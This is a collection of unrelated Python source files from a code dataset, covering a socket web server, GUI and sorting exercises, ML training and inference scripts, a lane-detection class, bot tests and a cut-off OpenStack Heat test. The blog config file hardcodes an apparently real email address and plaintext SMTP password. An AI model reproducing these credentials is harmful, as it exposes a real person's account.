f.write(\"\" % str(data['title'].encode('utf-8'), 'utf-8'))\n # f.write(\"\" % str(data['summary'].encode('utf-8'), 'utf-8'))\n f.write(\"

%s(%s)

\" % (str(data['title'].encode('utf-8'), 'utf-8'), count))\n f.write(\"

%s

\" % str(data['summary'].encode('utf-8'), 'utf-8'))\n f.write(\"\")\n count += 1\n\n f.write(\"
%s%s%s
\")\n f.write(\"\")\n f.write(\"\")\n","sub_path":"py_pure/src/imooc/spider_baike_171212/html_outputer.py","file_name":"html_outputer.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"562981319","text":"import socket\nimport _thread\n# TODO 了解thread(在python3中改名为_thread),threading 和 queue模块 和 multiprocessing模块(for CPU密集型任务) 和 logging 模块\n\nfrom utils import log\nfrom request import Request\n\nfrom routes import error\nfrom routes.routes_static import route_static\nfrom routes.routes_todo import route_dict as todo_routes\nfrom routes.routes_user import route_dict as user_routes\nfrom routes.routes_tweet import route_dict as tweet_routes\nfrom routes.routes_todo_ajax import route_dict as todo_ajax_routes\nfrom routes.routes_tweet_ajax import route_dict as tweet_ajax_routes\n\n\n# server.py的整理思路\n# 建立host和端口\n# 监听请求\n# 接受请求\n# 分解请求信息\n# method\n# path\n# query\n# body\n# 保存请求\n# 临时保存,用完就丢\n# 处理请求\n# 获取路由字典\n# path和响应函数的映射字典\n# 根据请求的path和字典处理请求并获得返回页面\n# routes\n# 主页\n# 返回页面\n# 登录\n# 处理post请求\n# 对比post数据和用户数据\n# 返回登录结果\n# 返回页面\n# 注册\n# 处理post请求\n# 对比post数据和注册规则\n# 保存合法的注册信息\n# 保存到User.txt\n# 返回注册结果\n# 返回页面\n# 留言板\n# 处理post请求\n# 将post的数据加入留言列表\n# 返回页面\n# 包含留言列表\n# 静态资源(图片)\n# 根据query的内容返回对应的资源\n# 返回响应内容\n# 发送响应内容\n# 关闭请求连接\n\n\ndef response_for_path(request, r):\n path = request.path\n response = r.get(path, error)\n return response(request)\n\n\n# 增加一个接收request的缓存函数\ndef request_cache(connection):\n buf = b''\n while True:\n cache = connection.recv(1024)\n buf += cache\n if len(cache) < 1024:\n break\n return buf.decode('utf-8')\n\n\ndef process_request(connection, r_d):\n r = request_cache(connection)\n # 因为 chrome 会发送空请求导致 split 得到空 list\n # 所以这里判断一下防止程序崩溃\n if len(r.split()) < 2:\n return\n # 设置 request 的 method\n request = Request(r)\n # chrome会发空请求,下面2行代码可以看出\n # log('r =====>', r)\n # log('r.split()=====>', r.split())\n # 用 response_for_path 函数来得到 path 对应的响应内容\n response = response_for_path(request, r_d)\n # 把响应发送给客户端\n connection.sendall(response)\n # 处理完请求, 关闭连接\n connection.close()\n\n\ndef run(host='', port=3000):\n \"\"\"\n 启动服务器\n \"\"\"\n # 初始化 socket 套路\n # 使用 with 可以保证程序中断的时候正确关闭 socket 释放占用的端口\n log('from run --> start at', '{}:{}'.format(host, port))\n print('from run --> start at', '{}:{}'.format(host, port))\n with socket.socket() as s:\n # 字典放在这里在多线程的时候就不会重复构造了\n r_d = {\n '/static': route_static,\n }\n r_d.update(user_routes)\n r_d.update(todo_routes)\n r_d.update(tweet_routes)\n r_d.update(todo_ajax_routes)\n r_d.update(tweet_ajax_routes)\n # 使用 下面这句 可以保证程序重启后使用原有端口, 原因忽略\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n s.bind((host, port))\n s.listen(5)\n # 无限循环来处理请求\n while True:\n connection, address = s.accept()\n # 第二个参数类型必须是 tuple\n _thread.start_new_thread(process_request, (connection, r_d))\n\n\nif __name__ == '__main__':\n # 生成配置并且运行程序\n config = dict(\n host='',\n port=3000,\n )\n run(**config)\n","sub_path":"server_normal/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"404000883","text":"# -*- coding: utf-8 -*-\nimport qsoptex\nimport time\nfilename = 'afiro.mps'\np = qsoptex.ExactProblem()\np.read(filename, filetype='MPS')\np.write('lp_' + filename[0:-4] + '.lp', filetype=\"LP\")\nstring = ''\nfor line in open('lp_' + filename[0:-4] + '.lp'):\n string += line\nprint (string)\np.set_param(qsoptex.Parameter.SIMPLEX_DISPLAY, 
1)\nstart=time.clock()\nstatus = p.solve()\nstop=time.clock()\nif status == qsoptex.SolutionStatus.OPTIMAL:\n    print('Solved in')\n    print (stop-start)\n    print('Vector X:')\n    print(list(map(float, p.get_values())))\n    print('Extremum:')\n    print(float(p.get_objective_value()))\nelse:\n    print(\"Not solved\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"192436467","text":"import tkinter\r\nimport tkinter.messagebox\r\nimport random\r\nfrom asyncio import tasks\r\n\r\n# Create root window\r\nroot = tkinter.Tk()\r\n\r\n# Change root window background color\r\nroot.configure(bg=\"white\")\r\n\r\n# Change the title\r\nroot.title(\"My Super To Do List\")\r\n\r\n# Change the window size\r\nroot.geometry(\"325x275\")\r\n\r\n# Create an empty list\r\ntasks = []\r\n\r\n# For testing purposes use a default list\r\n# tasks = [\"Call mom\", \"Buy a game\", \"Eat fries\"]\r\n\r\n# Create functions\r\n\r\ndef update_listbox():\r\n    # Clear the current list\r\n    clear_listbox()\r\n    # Populate the listbox\r\n    for task in tasks:\r\n        lb_tasks.insert(\"end\", task)\r\n\r\ndef clear_listbox():\r\n    lb_tasks.delete(0, \"end\")\r\n\r\ndef add_task():\r\n    # Get the task to add\r\n    task = txt_input.get()\r\n    # Make sure the task is not empty\r\n    if task !=\"\":\r\n        # Append to the list\r\n        tasks.append(task)\r\n        # Update the listbox\r\n        update_listbox()\r\n    else:\r\n        tkinter.messagebox.showwarning(\"Warning\", \"You need to enter a task.\")\r\n    txt_input.delete(0, \"end\")\r\n\r\ndef del_all():\r\n    confirmed = tkinter.messagebox.askyesno(\"Please Confirm\", \"Do you really want to delete all?\")\r\n    if confirmed == True:\r\n        # Since we are changing the list, it needs to be global\r\n        global tasks\r\n        # Clear the tasks list\r\n        tasks = []\r\n        # update the listbox\r\n        update_listbox()\r\n\r\ndef del_one():\r\n    # Get the text of the currently selected item\r\n    task = lb_tasks.get(\"active\")\r\n    # Confirm it is in the list \r\n    if task in tasks:\r\n        tasks.remove(task)\r\n        # Update the listbox\r\n        update_listbox()\r\n\r\ndef sort_asc():\r\n    # Sort the list \r\n    tasks.sort()\r\n    # Update the listbox\r\n    update_listbox()\r\n\r\ndef sort_decs():\r\n    # Sort the list \r\n    tasks.sort()\r\n    # reverse the list\r\n    tasks.reverse()\r\n    # Update the listbox\r\n    update_listbox()\r\n\r\ndef choose_random():\r\n    # Choose a random task\r\n    task = random.choice(tasks)\r\n    # Update the display label\r\n    lbl_display[\"text\"]=task\r\n\r\ndef show_number_of_tasks():\r\n    # Get the number of tasks\r\n    number_of_tasks = len(tasks)\r\n    # Create and format the message\r\n    msg = \"Number of tasks: %s\" %number_of_tasks\r\n    # Display the message\r\n    lbl_display[\"text\"]= msg\r\n\r\n\r\n\r\n\r\n\r\n\r\nlbl_title = tkinter.Label(root, text=\"To-Do-List\", bg=\"white\")\r\nlbl_title.grid(row=0,column=0)\r\n\r\nlbl_display = tkinter.Label(root, text=\"\", bg=\"white\")\r\nlbl_display.grid(row=0,column=1)\r\n\r\ntxt_input = tkinter.Entry(root, width=15)\r\ntxt_input.grid(row=1,column=1)\r\n\r\nbtn_add_task = tkinter.Button(root, text=\"Add task\", fg=\"black\", bg=\"white\", command=add_task)\r\nbtn_add_task.grid(row=1,column=0)\r\n\r\nbtn_del_all = tkinter.Button(root, text=\"Delete All\", fg=\"black\", bg=\"white\", command=del_all)\r\nbtn_del_all.grid(row=2,column=0)\r\n\r\nbtn_del_one = tkinter.Button(root, text=\"Delete\", fg=\"black\", bg=\"white\", 
command=del_one)\r\nbtn_del_one.grid(row=3,column=0)\r\n\r\nbtn_sort_asc = tkinter.Button(root, text=\"Sort (ASC)\", fg=\"black\", bg=\"white\", command=sort_asc)\r\nbtn_sort_asc.grid(row=4,column=0)\r\n\r\nbtn_sort_decs = tkinter.Button(root, text=\"Sort (DECS)\", fg=\"black\", bg=\"white\", command=sort_decs)\r\nbtn_sort_decs.grid(row=5,column=0)\r\n\r\nbtn_choose_random = tkinter.Button(root, text=\"Choose Random\", fg=\"black\", bg=\"white\", command=choose_random)\r\nbtn_choose_random.grid(row=6,column=0)\r\n\r\nbtn_number_of_task = tkinter.Button(root, text=\"Number of Tasks\", fg=\"black\", bg=\"white\", command=show_number_of_tasks)\r\nbtn_number_of_task.grid(row=7,column=0)\r\n\r\nbtn_exit = tkinter.Button(root, text=\"Exit\", fg=\"black\", bg=\"white\", command=exit)\r\nbtn_exit.grid(row=8,column=0)\r\n\r\nlb_tasks = tkinter.Listbox(root)\r\nlb_tasks.grid(row=2,column=1,rowspan=7)\r\n\r\n# Start the main events loop\r\nroot.mainloop()","sub_path":"GUI_ToDoList.py","file_name":"GUI_ToDoList.py","file_ext":"py","file_size_in_byte":3779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"379275910","text":"\"\"\"\nSort the given sequence of N numbers in ascending order and print it.\n\n[Constraints]\n\nN is between 5 and 50 inclusive.\n\n\n[Input]\n\nThe first line gives the number of test cases T, and the test cases follow below it.\n\nThe first line of each test case gives N, and the next line gives N numbers.\n\n\n[Output]\n\nEach output line starts with '#t', followed by one space and then the answer.\n\n(t is the test case number, starting from 1.)\n\nInput\n10\n5\n1 4 7 8 0\n...\nOutput\n#1 0 1 4 7 8\n...\n\"\"\"\nimport sys\nsys.stdin = open('input.txt')\nt = int(input())\n\nfor i in range(t):\n    a = int(input())\n    arr = list(map(int,input().split()))\n    arr.sort()\n\n    print('#%d'%(i+1),end=' ')\n    for j in range(len(arr)):\n        print(arr[j],end=' ')\n    print('')","sub_path":"python daily coding/2020.5.09 (SW Expert Academy)/1966번 (숫자를 정렬하자).py","file_name":"1966번 (숫자를 정렬하자).py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"456281381","text":"#coding:utf-8\n\n##############################\n# Features still needed:\n# auto-configure from the user's module and mode settings, with no changes to the views code\n# add user comments, with email notification after a comment\n# add scheduled refresh\n# add an admin backend\n# add posting articles from the backend\n# add saving data to cloud storage\n# add user configuration from the backend\n\n###########System settings#############\n# default cache size\nCACHE_SIZE = 10\n# refresh time in minutes; 0 or less disables the cache and makes CACHE_SIZE ineffective; defaults to 10 minutes, may be larger than 10, values below 10 fall back to 10\nREFRESH_TIME = 20\n\n###########Blog settings#############\n# blog root directory\nROOT_DIR = \"/home/ever/Documents/blog/\"\n# default number of entries per page\nDEFAULT_ENTRY_NUM = 6\n# default sort method\nSORT_BY = 'time'\n# descending by default\nDEFAULT_DES = True\n# prefixes to ignore, for both files and file names\nIGNORE_PREFIX = ['.', '_', '*', '~']\n# directory names to ignore\nIGNORE_DIR = ['img', 'file', 'code', 'media', 'test', 'tmp', 'src']\n# file names to ignore\nIGNORE_FILE = ['临时', 'tmp']\n# file extensions allowed to be read\nFILE_TYPE = ['.md', '.markdown', '.html']\n\n###########Page settings############\n# template theme\nTHEME = 'blackAndWhite'\n# theme top-bar settings\n# includes the main title, the subtitle and the displayed module names; each module should be followed by a link, plus a module layout mode such as three-column, two-column, one-column and so on\nTOP_BAR = {\n    \"title\": \"城南旧事\",\n    \"list\": [\n        {\"Home\": \"\"},\n        {\"Notes\": \"biji\"},\n        {\"Essays\": \"suibi\"},\n        {\"Design\": \"sheji\"},\n        {\"Photography\": \"sheying\"},\n        {\"Projects\": \"project\"},\n        {\"Contact\": \"contact\"}\n    ]\n}\n# number of leading lines of a file shown in the preview\nSHOW_LINES = 15\n\n# whether to filter images out of the preview page; usually set when ARTICLE_DEFAULT's top_icon is empty\n# meaning that if the first lines of the article contain an image, it will be shown\n# usually not shown; the icon from the template is used instead\nSHOW_ARTICLE_IMG_IN_THUMBNAIL = False\n\n###########Personal info settings############\nAUTHOR_INFO = {\n    \"name\": \"redusty\",\n    \"icon\": [\"\"],\n    \"des\": [\"\"],\n    \"qrcode\": [\"\"],\n    \"address\": [\"\"],\n    \"phone\": [\"\"],\n    \"email\":[\"\"],\n    \"qq\": [\"\"],\n    \"hobby\":[\"\"],\n    
\"moto\": \"The quiter you become, the more you are able to hear.\",\n \"introduceYourself\": \"\",\n}\n\n###########默认文章信息设置############\nARTICLE_DEFAULT = {\n \"source\": \"原创\",\n # 默认缩略图图标\n \"icon\": \"/static/img/logo2.jpg\",\n # 文章顶部图片\n \"top_icon\": \"\",\n}\n\n###########默认游客信息#############\nGUEST_INFO = {\n \"name\" : \"guest\",\n \"avatar\" : \"\",\n \"des\" : \"\"\n}\n\n###########邮件配置###########\nEMAIL = {\n # 邮件服务器\n \"host\": \"smtp.163.com\",\n # 邮件服务器端口\n \"port\": 25,\n # 邮箱名称\n \"user\": \"binary@163.com\",\n # 邮箱密码\n \"password\": \"tian163\",\n # 接收邮件的人\n \"emailto\": [\"redusty@163.com\",]\n}\n","sub_path":"src/MarkDownBlog/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"581769862","text":"class Line:\n def __init__(self, lim, corners):\n # was the line detected in the last iteration?\n self.detected = False\n self.beldetected = False\n # x values of the last n fits of the line\n self.fitx = None\n # y values of the last n fits of the line\n self.fity = None\n #polynomial coefficients averaged over the last n iterations\n self.updated_fit = None\n # best fit\n self.best_fit = None\n # x values detected\n self.allx = None\n #y values for detected line pixels\n self.ally = None\n # top x of corners\n self.btopxy = corners[0]\n # bottom x of corners\n self.bbotxy = corners[1]\n # top x of updated\n self.utopxy = None\n # bottom x of update\n self.ubotxy = None\n # lower and upper of corners\n self.pointlim = lim\n # x values of the bird's eye line\n self.belx = None\n # y values of the bird's eye line\n self.bely = None\n #polynomial coefficients over ebl\n self.bel_fit = None\n #curvature\n self.curverad = None\n\n def setLine(self, x, y):\n if x and y:\n self.allx = np.asarray(x)\n self.ally = np.asarray(y)\n self.detected = True\n else:\n self.detected = False\n\n def updateLineFit(self, LU, thres):\n '''\n This function updates the curve fit given thres.\n If the line fit is not detected then set the line fit\n based on allx, ally\n If the line fit exists, first compare allx and fitx and\n if the diff is less than thres, replace or\n add the corresponding allx and ally to fitx and fity\n Input: self.allx, self.ally, thres\n Output: self.updated_fit\n '''\n if self.updated_fit is None:\n self.fitx = self.allx\n self.fity = self.ally\n else:\n x_ = np.polyval(self.updated_fit, self.ally)\n x_.astype(int)\n #print(np.abs(x_ - self.allx))\n truefalse = np.abs(x_ - self.allx) < thres\n x__ = self.allx[truefalse]\n y__ = self.ally[truefalse]\n for i, val in enumerate(y__):\n indx = np.argwhere(self.fity == val)\n if indx.any():\n #print(self.fitx[indx])\n self.fitx[indx] = x__[i]\n else:\n self.fitx = np.append(self.fitx, x__[i])\n self.fity = np.append(self.fity, val)\n self.updated_fit = np.polyfit(self.fity, self.fitx, 2)\n\n def updateBestFitwithUpdated(self):\n self.best_fit = self.updated_fit\n\n def updateBestPointswithUpdated(self):\n self.btopxy = self.utopxy\n self.bbotxy = self.ubotxy\n\n def getBestLine(self, LU):\n x_ = None\n y_ = None\n if self.updated_fit is not None:\n y_ = np.sort(self.fity)\n x_ = np.polyval(self.updated_fit, y_)\n elif self.best_fit is not None:\n y_ = range(LU[0], LU[1])\n x_ = np.polyval(self.best_fit, y_)\n return x_, y_\n\n def setBestPoints(self, topxy, botxy):\n self.btopxy = topxy\n self.bbotxy = botxy\n\n def getUpdatedPoints(self, y):\n l0 = self.pointlim[0] * y\n l1= self.pointlim[1] * y\n 
self.utopxy = [int(np.polyval(self.updated_fit, l0)), int(l0)]\n        self.ubotxy = [int(np.polyval(self.updated_fit, l1)), int(l1)]\n        return self.utopxy, self.ubotxy\n\n    def getBestPoints(self, y):\n        return self.btopxy, self.bbotxy\n\n    def isDetected(self):\n        return self.detected\n\n    def isBelDetected(self):\n        return self.beldetected\n\n    def setBEL(self, x, y):\n        if x and y:\n            self.belx = np.asarray(x)\n            self.bely = np.asarray(y)\n            self.beldetected = True\n        else:\n            self.beldetected = False\n\n    def updateBELFit(self, LU, thres):\n        #alpha: weight for bestx, the greater, the less the update\n        if self.bel_fit is not None:\n            x_ = np.polyval(self.bel_fit, self.bely)\n            x_.astype(int)\n            truefalse = np.abs(x_ - self.belx) < thres\n            x__ = self.belx[truefalse]\n            y__ = self.bely[truefalse]\n            for i, val in enumerate(y__):\n                indx = np.argwhere(self.bely == val)\n                if indx.any():\n                    #print(self.fitx[indx])\n                    self.belx[indx] = x__[i]\n                else:\n                    self.belx = np.append(self.belx, x__[i])\n                    self.bely = np.append(self.bely, val)\n        self.bel_fit = np.polyfit(self.bely, self.belx, 2)\n\n    def getBELFitx(self, y):\n        belfitx = np.polyval(self.bel_fit, y)\n        belfitx = np.asarray(belfitx, dtype=int)\n        return belfitx\n\n    def getCurveRad(self):\n        y_eval = np.max(self.bely)\n        self.curverad = ((1 + (2*self.bel_fit[0]*y_eval + self.bel_fit[1])**2)**1.5)/np.absolute(2*self.bel_fit[0])\n        return self.curverad\n    \n    def getCurveRadinMeter(self, imgheight, lanewidth):\n        # Define conversions in x and y from pixels space to meters\n        ym_per_pix = 30/imgheight # meters per pixel in y dimension\n        xm_per_pix = 3.7/lanewidth # meters per pixel in x dimension\n\n        y_eval = 30\n        fit_cr = np.polyfit(self.bely*ym_per_pix, self.belx*xm_per_pix, 2)\n        curverad = ((1 + (2*fit_cr[0]*y_eval + fit_cr[1])**2)**1.5)/np.absolute(2*fit_cr[0])\n        return int(curverad)\n","sub_path":"Line.py","file_name":"Line.py","file_ext":"py","file_size_in_byte":5543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"316257621","text":"# Course: IT102 Section C\n# Authors: Victor Woo\n# Date: 24/10/2016\n# Assignment: PP10\n\nimport random\n\ndef getINPUTS(wordList, counter):\n    while(True):\n\n        if(counter+1 == 1):\n            counterWORD = \"1st\"\n        elif(counter+1 == 2):\n            counterWORD = \"2nd\"\n        elif(counter+1 == 3):\n            counterWORD = \"3rd\"\n        else:\n            # 4th, 5th and beyond take the \"th\" suffix\n            counterWORD = str(counter+1) + \"th\"\n\n        if(counter == 5):\n            break;\n\n        wordINPUT = input(\"Please enter 5 words. This is your \" + counterWORD + \" word \");\n        if(wordINPUT.isalpha() == True):\n            word.append(wordINPUT)\n            counter+=1\n        else:\n            print(\"Please enter a real word\");\n\ndef mixMeUp(mixWORD):\n    return ''.join(random.sample(mixWORD,len(mixWORD)));\n\ndef GuessME(beforeList, afterList):\n    guessINPUT = input(\"Guess what the anagram word is \" + afterList + \" \");\n\n    if(beforeList == guessINPUT):\n        print(\"Correct\")\n        return True\n    else:\n        print(\"Incorrect\")\n        return False\n\nword = [];\nwordBEFORE = []\ncounter = 0;\nGMList = [];\nGMCounter = 0;\n\ngetINPUTS(word, counter);\nwordBEFORE = list(word);\n# shuffle all 5 words, not just the first 4\nfor i in range(5):\n    word[i] = mixMeUp(word[i])\n\nwhile GMCounter < 5:\n    randomINT = random.randint(0, 4)\n    if (randomINT not in GMList):\n        if(GuessME(wordBEFORE[randomINT], word[randomINT]) == True):\n            GMList.append(randomINT);\n            GMCounter+=1;\n\nprint(\"Nice work buddy. 
Thanks for playing\");\n","sub_path":"python-learn/PP10.py","file_name":"PP10.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"113145317","text":"from telegram import Chat\n\nfrom functionalities.unhandled import UnhandledMessageFunctionality\nfrom tests.util.mock_telegram_update import MockTelegramUpdate\n\n\ndef test_unhandled_message(context):\n update = MockTelegramUpdate.with_message(\n text=\"Hello can I have a picture\"\n )\n unhandled = UnhandledMessageFunctionality()\n\n unhandled.call(update, context)\n\n context.bot.send_message.assert_called_with(\n chat_id=update.message.chat_id,\n text=\"Sorry, I'm not sure how to handle that message\"\n )\n\n\ndef test_unhandled_group_message(context):\n update = MockTelegramUpdate.with_message(\n text=\"Hey friendo, how are you?\",\n chat_type=Chat.GROUP\n )\n unhandled = UnhandledMessageFunctionality()\n\n unhandled.call(update, context)\n\n context.bot.send_message.assert_not_called()\n","sub_path":"tests/functionality/test_unhandled_message.py","file_name":"test_unhandled_message.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"163471225","text":"from tensorflow.examples.tutorials.mnist import input_data\nimport tensorflow as tf\nfrom tensorflow.python.keras import layers\nimport os\nimport numpy as np\nos.chdir('/home/zzy/PycharmProjects/tf/')\n\ndata = input_data.read_data_sets('data/MNIST/',one_hot=True)\n\nprint(data.train.labels[0])\ninput = layers.Input(shape=(28,28,1))\n\nlayer_a = layers.Conv2D(16,(5,5),activation='relu')(input)\nlayer_a1 = layers.MaxPool2D((2,2),2)(layer_a)\nlayer_a2 = layers.Dropout(0.25)(layer_a1)\n\nlayer_b = layers.Conv2D(36,(5,5),activation='relu')(layer_a2)\nlayer_b1 = layers.MaxPool2D((2,2),2)(layer_b)\nlayer_b2 = layers.Dropout(0.25)(layer_b1)\nlayer_b3 = layers.Flatten()(layer_b2)\nlayer_c = layers.Dense(128,activation='relu')(layer_b3)\nlayer_c1 = layers.Dropout(0.25)(layer_c)\n\noutput = layers.Dense(10,activation='softmax')(layer_c1)\n\nmodel = tf.keras.Model(input,output)\n\nmodel.compile(loss='categorical_crossentropy',optimizer=tf.keras.optimizers.SGD(lr=0.01,decay=1e-6,momentum=0.9,nesterov=True),metrics = ['accuracy'])\n\ntrain_images = np.reshape(data.train.images,(-1,28,28,1))\nvar_images = np.reshape(data.validation.images,(-1,28,28,1))\nmodel.fit(train_images,data.train.labels, epochs=500, batch_size=64, validation_data=(var_images, data.validation.labels))\n\n\n","sub_path":"train/tf_mnist.py","file_name":"tf_mnist.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"108910400","text":"# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport time\nimport tensorflow as tf\nfrom tensorflow.python.client import timeline\n\n# from nets import inception\nimport deep_speech_model\nfrom tensorflow.python.framework import graph_util\n\nslim = tf.contrib.slim\n\nflags = tf.flags\nflags.DEFINE_integer(\"batch_size\", 1, \"mini batch size\")\nflags.DEFINE_integer(\"hidden_size\", 256, \"hidden size\")\nflags.DEFINE_boolean('profile', False, 'profile kernel runtime')\nflags.DEFINE_integer(\"num_iter\", 10, \"mini batch 
size\")\nflags.DEFINE_integer(\"warmup\", 5, \"mini batch size\")\nflags.DEFINE_boolean('xla', False, 'enable xla')\nflags.DEFINE_string('frozen_file', '', 'output path for the frozen pb file')\nflags.DEFINE_integer(\"parallel\", 0, \"tf.ConfigProto.inter_op_parallelism_threads\")\n\nFLAGS = flags.FLAGS\n\n\ndef main(_):\n session_conf = tf.ConfigProto(\n allow_soft_placement=True,\n log_device_placement=False,\n graph_options=tf.GraphOptions(infer_shapes=True),\n inter_op_parallelism_threads=FLAGS.parallel\n )\n if FLAGS.xla:\n session_conf.graph_options.optimizer_options.global_jit_level = tf.OptimizerOptions.ON_1\n with tf.Graph().as_default(), tf.Session(config=session_conf) as session:\n batch_size = FLAGS.batch_size\n\n num_classes = 29\n height = 300 # voice length\n hidden_size = FLAGS.hidden_size\n\n eval_inputs = tf.placeholder(\n tf.float32, [batch_size, height, 171, 1], 'eval_input')\n\n model = deep_speech_model.DeepSpeech2(num_rnn_layers=7, rnn_type='lstm', is_bidirectional=False,\n rnn_hidden_size=hidden_size, num_classes=num_classes, use_bias=True)\n\n logits = model(eval_inputs, False)\n\n image_inputs = np.ones((batch_size, height, 171, 1))\n\n session.run(tf.global_variables_initializer())\n\n if FLAGS.frozen_file != '':\n constant_graph = graph_util.convert_variables_to_constants(session, session.graph_def, [logits.name.split(':')[0]])\n with tf.gfile.GFile(FLAGS.frozen_file, \"wb\") as f:\n f.write(constant_graph.SerializeToString())\n\n if not FLAGS.profile:\n # warm up\n for i in range(FLAGS.warmup):\n output = session.run(logits, {eval_inputs: image_inputs})\n out_flat = output.flat\n if (len(out_flat) > 0):\n max_len = min(10, len(out_flat))\n print(logits.name)\n print(out_flat[:max_len], \"...(size=\", len(out_flat), \"end with\", out_flat[-1], \")\")\n\n iter_times = []\n\n for i in range(FLAGS.num_iter):\n start_time = time.time()\n output = session.run(logits, {eval_inputs: image_inputs})\n iter_time = (time.time() - start_time) * 1000\n iter_times.append(iter_time)\n print(\"Iteration time %f ms\" % (iter_time))\n\n print(\"Summary: [min, max, mean] = [%f, %f, %f] ms\" % (\n min(iter_times), max(iter_times), sum(iter_times) / len(iter_times)))\n\n else:\n options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)\n run_metadata = tf.RunMetadata()\n for i in range(5):\n start_time = time.time()\n output = session.run(logits, {eval_inputs: image_inputs},\n options=options,\n run_metadata=run_metadata)\n end_time = (time.time() - start_time) * 1000\n print(\"iteration time %f ms\" % (end_time))\n fetched_timeline = timeline.Timeline(run_metadata.step_stats)\n chrome_trace = fetched_timeline.generate_chrome_trace_format()\n with open('timelines/timeline_step_%d.json' % i, 'w') as f:\n f.write(chrome_trace)\n\n\nif __name__ == \"__main__\":\n tf.app.run()\n","sub_path":"artifacts/models/deepspeech2/deep_speech_inference.py","file_name":"deep_speech_inference.py","file_ext":"py","file_size_in_byte":4091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"420428252","text":"from __future__ import absolute_import\nfrom builtins import str\nfrom builtins import range\nfrom .base import BaseSolutionsTest\nfrom common.heat.base import BaseHeatTest\nfrom tcutils.wrappers import preposttest_wrapper\nimport test\nfrom ipam_test import *\nfrom vn_test import *\nfrom quantum_test import *\nfrom floating_ip import FloatingIPFixture\nfrom vm_test import *\nfrom tcutils.test_lib.test_utils import assertEqual\nfrom vnc_api 
import vnc_api\nfrom vnc_api.gen.resource_test import *\nfrom heat_test import HeatStackFixture\nfrom nova_test import *\nimport os\nimport yaml\nimport time\nimport glob\n\naf_test = 'dual'\n\nclass OrangeSolutionTest(BaseSolutionsTest):\n _interface = 'json'\n\n @classmethod\n def setUpClass(cls):\n super(OrangeSolutionTest, cls).setUpClass()\n #Can update deployment path based on variable.\n cls.deploy_path=os.getenv('DEPLOYMENT_PATH',\n 'serial_scripts/solution/topology/mini_deployment/')\n cls.fip=bool(os.getenv(\"USE_FIP\", 'False').lower() in ['true', '1'])\n cls.setup_vepg()\n\n @classmethod\n def tearDownClass(cls):\n cls.delete_vepg()\n super(OrangeSolutionTest, cls).tearDownClass()\n\n @classmethod\n def setup_vepg(cls):\n\n if \"orange\" in cls.deploy_path:\n ## TBD - NEED TO DERIVE VALUES BASED ON INPUTS\n cls.NB_VSFO_CP_NODES=2\n cls.NB_VSFO_UP_NODES=2\n #vSFO CP sizing\n cls.NB_VSFO_CP_EXT_NIC=1\n cls.NB_VSFO_CP_SIGIF=3\n cls.NB_APN_RADIUS=5\n # vSFO UP sizing\n cls.NB_VSFO_UP_EXT_NIC=4\n cls.NB_VSFO_UP_CNNIC=2\n cls.NB_VSFO_UP_CNIF=2\n cls.NB_APN=100\n cls.NB_BGP_PREFIXES_PER_APN=384\n else:\n ## TBD - NEED TO DERIVE VALUES BASED ON INPUTS\n cls.NB_VSFO_CP_NODES=1\n cls.NB_VSFO_UP_NODES=1\n #vSFO CP sizing\n cls.NB_VSFO_CP_EXT_NIC=1\n cls.NB_VSFO_CP_SIGIF=3\n cls.NB_APN_RADIUS=5\n # vSFO UP sizing\n cls.NB_VSFO_UP_EXT_NIC=2\n cls.NB_VSFO_UP_CNNIC=1\n cls.NB_VSFO_UP_CNIF=2\n cls.NB_APN=5\n cls.NB_BGP_PREFIXES_PER_APN=10\n\n #Quota Create.\n cls.quota_env_file=cls.deploy_path+\"env/quota.yaml\"\n with open(cls.quota_env_file, 'r') as fd:\n cls.quota_env = yaml.load(fd, Loader=yaml.FullLoader)\n\n cls.quota_template_file=cls.deploy_path+\"template/quota.yaml\"\n with open(cls.quota_template_file, 'r') as fd:\n cls.quota_template = yaml.load(fd, Loader=yaml.FullLoader)\n\n #Update env with project name.\n cls.quota_env['parameters']['project'] = cls.connections.project_name\n cls.quota_stack = HeatStackFixture(\n connections=cls.connections,\n stack_name=cls.connections.project_name+'_quota',\n template=cls.quota_template, env=cls.quota_env)\n cls.quota_stack.setUp()\n\n #Image Upload.\n cls.vrp_image = cls.nova_h.get_image('VRP-IMAGE')\n cls.vsfo_cp_image = cls.nova_h.get_image('VSFO-CP-IMAGE')\n cls.vsfo_up_image = cls.nova_h.get_image('VSFO-UP-IMAGE')\n\n #Flavor Create.\n cls.flavors_template_file=cls.deploy_path+\"template/flavors.yaml\"\n with open(cls.flavors_template_file, 'r') as fd:\n cls.flavors_template = yaml.load(fd, Loader=yaml.FullLoader)\n\n cls.flavors_stack = HeatStackFixture(\n connections=cls.connections,\n stack_name=cls.connections.project_name+'_flavors',\n template=cls.flavors_template)\n cls.flavors_stack.setUp()\n\n #AZ Create.\n cls.agg_id = {}\n if not 